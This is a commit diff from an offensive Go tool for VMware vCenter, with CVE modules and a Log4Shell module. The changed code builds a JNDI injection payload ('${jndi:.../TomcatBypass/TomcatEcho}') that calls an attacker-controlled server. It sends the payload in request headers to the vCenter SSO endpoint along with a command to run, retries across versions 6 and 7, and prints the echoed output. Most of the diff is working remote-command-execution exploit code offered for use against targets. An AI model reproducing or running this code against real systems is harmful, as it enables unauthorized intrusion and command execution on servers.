Skip to content

Commit

Permalink
v1.3.4 bug fix
Browse files Browse the repository at this point in the history
  • Loading branch information
root committed Oct 11, 2022
1 parent 6b37a97 commit 8acfc27
Show file tree
Hide file tree
Showing 4 changed files with 50 additions and 22 deletions.
1 change: 1 addition & 0 deletions go.mod
Original file line number Diff line number Diff line change
Expand Up @@ -8,6 +8,7 @@ require (
github.com/cheekybits/genny v1.0.0 // indirect
github.com/fatih/color v1.13.0 // indirect
github.com/fsnotify/fsnotify v1.5.4 // indirect
github.com/go-resty/resty/v2 v2.7.0 // indirect
github.com/go-task/slim-sprig v0.0.0-20210107165309-348f09dbbbc0 // indirect
github.com/hashicorp/errwrap v1.1.0 // indirect
github.com/hashicorp/go-multierror v1.1.1 // indirect
Expand Down
3 changes: 3 additions & 0 deletions go.sum
Original file line number Diff line number Diff line change
Expand Up @@ -34,6 +34,8 @@ github.com/fsnotify/fsnotify v1.5.4/go.mod h1:OVB6XrOHzAwXMpEM7uPOzcehqUV2UqJxmV
github.com/ghodss/yaml v1.0.0/go.mod h1:4dBDuWmgqj2HViK6kFavaiC9ZROes6MMH2rRYeMEF04=
github.com/gliderlabs/ssh v0.1.1/go.mod h1:U7qILu1NlMHj9FlMhZLlkCdDnU1DBEAqr0aevW3Awn0=
github.com/go-errors/errors v1.0.1/go.mod h1:f4zRHt4oKfwPJE5k8C9vpYG+aDHdBFUsgrm6/TyX73Q=
github.com/go-resty/resty/v2 v2.7.0 h1:me+K9p3uhSmXtrBZ4k9jcEAfJmuC8IivWHwaLZwPrFY=
github.com/go-resty/resty/v2 v2.7.0/go.mod h1:9PWDzw47qPphMRFfhsyk0NnSgvluHcljSMVIq3w7q0I=
github.com/go-task/slim-sprig v0.0.0-20210107165309-348f09dbbbc0 h1:p104kn46Q8WdvHunIJ9dAyjPVtrBPhSr3KT2yUst43I=
github.com/go-task/slim-sprig v0.0.0-20210107165309-348f09dbbbc0/go.mod h1:fyg7847qk6SyHyPtNmDHnmrv/HOrqktSC+C9fM+CJOE=
github.com/gogo/protobuf v1.1.1/go.mod h1:r8qH/GZQm5c6nD/R0oafs1akxWv10x8SbQlK7atdtwQ=
Expand Down Expand Up @@ -201,6 +203,7 @@ golang.org/x/net v0.0.0-20201021035429-f5854403a974/go.mod h1:sp8m0HH+o8qH0wwXwY
golang.org/x/net v0.0.0-20210226172049-e18ecbb05110/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg=
golang.org/x/net v0.0.0-20210405180319-a5a99cb37ef4/go.mod h1:p54w0d4576C0XHj96bSt6lcn1PtDYWL6XObtHCRCNQM=
golang.org/x/net v0.0.0-20210428140749-89ef3d95e781/go.mod h1:OJAsFXCWl8Ukc7SiCT/9KSuxbyM7479/AVlXFRxuMCk=
golang.org/x/net v0.0.0-20211029224645-99673261e6eb/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y=
golang.org/x/net v0.0.0-20211112202133-69e39bad7dc2/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y=
golang.org/x/net v0.0.0-20220624214902-1bab6f366d9e/go.mod h1:XRhObCWvk6IyKnWLug+ECip1KBveYUHfp+8e9klMJ9c=
golang.org/x/net v0.0.0-20220722155237-a158d28d115b/go.mod h1:XRhObCWvk6IyKnWLug+ECip1KBveYUHfp+8e9klMJ9c=
Expand Down
11 changes: 2 additions & 9 deletions main.go
Original file line number Diff line number Diff line change
Expand Up @@ -29,7 +29,7 @@ func usage() {
-u url
you target, example: https://192.168.1.1
-m module
you selected cve code, example: 21972 or 22205 or 21985 or log4center
you selected cve code, example: 21972 or 22005 or 21985 or log4center
-c command
you want execute command, example: "whoami"
-f filename
Expand Down Expand Up @@ -117,14 +117,7 @@ func main() {
usage()
os.Exit(0)
} else {
if log4jcenter.Exec_cmd(url, rmi, command, "6") {
//
} else {
fmt.Println("[-] Vcenter 6.X paylaod 利用失败,尝试7.0")
if !log4jcenter.Exec_cmd(url, rmi, command, "7") {
fmt.Println("[-] 回显失败,目标不存在漏洞或其他原因.")
}
}
log4jcenter.Execc(url, rmi, command)
}

} else {
Expand Down
57 changes: 44 additions & 13 deletions src/log4jcenter/log4j.go
Original file line number Diff line number Diff line change
@@ -1,13 +1,17 @@
package log4jcenter

import (
"crypto/tls"
"fmt"
"io"
"net"
"os"
"strings"
"sync"
"time"

"github.com/go-resty/resty/v2"

"github.com/imroc/req/v3"
)

Expand Down Expand Up @@ -127,12 +131,15 @@ func exploit(url, rmiserver string) {

}

func Exec_cmd(url, rmiserver, command, version string) bool {
func exec_cmd(url, rmiserver, command, version string) (bool, string) {
host := rmiserver
client := req.C()
client.EnableForceHTTP1()
// client.DisableAutoReadResponse()
// client.SetUnixSocket("1.sock")
client.EnableInsecureSkipVerify()
client.SetTimeout(2 * time.Second)
client.DisableAutoReadResponse()
client.SetTimeout(4 * time.Second)
// client.SetProxyURL("http://127.0.0.1:8080") //尽量别用burp做代理,burp2022.8会启用http2,导致vcenter报错403
rmi_server := ""
cmd := ""
Expand All @@ -143,7 +150,7 @@ func Exec_cmd(url, rmiserver, command, version string) bool {
rmi_server = fmt.Sprintf("${jndi:%s/TomcatBypass/TomcatEcho}", host)
cmd = command + ";echo 'nmsl'"
}

_ = cmd
myheader := map[string]string{
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
Expand All @@ -157,32 +164,56 @@ func Exec_cmd(url, rmiserver, command, version string) bool {
"Cmd": cmd,
}

resp, err := client.R().
cli := resty.New().SetTLSClientConfig(&tls.Config{InsecureSkipVerify: true})

resp, err := cli.R().
EnableTrace().
SetHeaders(myheader).
Get(url + "/websso/SAML2/SSO/vsphere.local?SAMLRequest=")
if err != nil && strings.Contains(err.Error(), "EOF") {
//
} else if err == nil {

// log.Fatal(err)
_ = err
// fmt.Println(resp.String())

// resp, err := client.R().
// SetHeaders(myheader).
// Get(url + "/websso/SAML2/SSO/vsphere.local?SAMLRequest=")
if err != nil && err == io.ErrUnexpectedEOF {
//
} else if strings.Contains(err.Error(), "NO_ERROR") {
//
} else {
fmt.Println("[-] 连接失败,请检查网络.")
os.Exit(0)
}
if resp.StatusCode == 200 {
if resp.StatusCode() == 200 {
result := resp.String()
result = strings.Split(result, "nmsl")[0]
result = strings.TrimRight(result, "\n")
fmt.Println(result)
return true
// fmt.Println(resp.String())
// fmt.Println(result)
// fmt.Println(1)
return true, result
} else {

return false
return false, ""
}

}

func Execc(url, rmiserver, command string) {
for i := 0; i < 5; i++ {
temp1, temp2 := exec_cmd(url, rmiserver, command, "7")
if temp1 {
fmt.Println(temp2)
break
}
temp3, temp4 := exec_cmd(url, rmiserver, command, "6")
if temp3 {
fmt.Println(temp4)
break
}
}
}

func getIpAddr2(url string) string {

tmp := strings.Split(url, ":")
Expand Down

0 comments on commit 8acfc27

Please sign in to comment.